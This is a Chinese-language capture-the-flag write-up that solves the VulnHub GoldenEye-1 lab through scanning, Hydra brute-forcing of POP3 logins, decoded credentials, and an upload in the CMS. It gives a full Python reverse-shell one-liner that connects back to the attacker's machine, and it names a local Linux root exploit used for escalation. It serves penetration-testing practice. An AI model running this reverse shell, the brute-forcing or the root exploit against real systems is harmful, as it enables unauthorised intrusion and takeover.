VulnHub-GoldenEye-1-Walkthrough

靶机地址:

https://www.vulnhub.com/entry/goldeneye-1,240/

下载成功过后使用虚拟机打开

需要注意:

靶机和kail的网络适配器需要一致,不然会扫描不出来,这里我使用的的nat模式。

使用netdiscover获取目标IP地址

这里我的目标ip为192.168.32.133

使用nmap扫描ip开发的端口。

nmap -sS -sV -A -p- 192.168.31.132

扫描出来了80端口

打开出来查看

看到一个路径 打开看看

弹出来一个登录框

不知道账号密码

常规看看页码源代码和js

点击terminal.js

这一串英语 

翻译:

//鲍里斯,确保你更新了默认密码。

//我的消息来源说军情六处可能计划潜入。

//警惕任何可疑的网络流量。。。。

//

//我给你编码了p@ssword在下面

//InvincibleHack3r

//顺便说一句,娜塔莉亚说她可以破解你的密码

 

那么我们尝试进行解码

这个编码是html编码

 

结果为:

InvincibleHack3r

尝试用人名和密码登录

没想到居然没有成功

问题出在人名小写...

登录成功

接着查看页码源代码

翻译:

可以猜测是爆破邮件

通过网页访问可以知道5007是pop服务

之前的js可以看出使用默认密码

使用九头蛇指定用户名爆破

可以看到已经爆出来了

使用账号登录 

查看邮件

没什么东西 

使用下一个账号查看

给了账号密码和网址

提醒我们在hosts里面修改

这里修改需要root权限,不然提示只读

sudo vim /etc/hosts

登录看看

可以看到用户名

我们继续使用九头蛇爆破

又是一个登录账号密码

可以看到网站cms的版本还有一个文件

下载查看

打开有个路径,是个图片,提示有东西

进行base64解码

xWinter1995x!

就是管理员密码

搜索cms漏洞

 网上的不是很详细

看了一下功能点 找到了一个上传

上传反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.32.129",5566));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

ip地址为kail的Ip

修改 使用pspellshell运行 

使用nc监听端口

随便输入点击发送

成功

但是权限为www

网上找了一下乌班图提权

使用kail本地的文件来提权

cp /usr/share/exploitdb/exploits/linux/local/37292.c 自己想放的目录

打开

因为没有gcc 所以改为cc

开启http服务把它传上去

使用cc编译 之后给允许执行权限

运行

可以看到已经是root权限了

查找falg

 

posted @ 2022-11-07 20:08  错的是我  阅读(69)  评论(0)    收藏  举报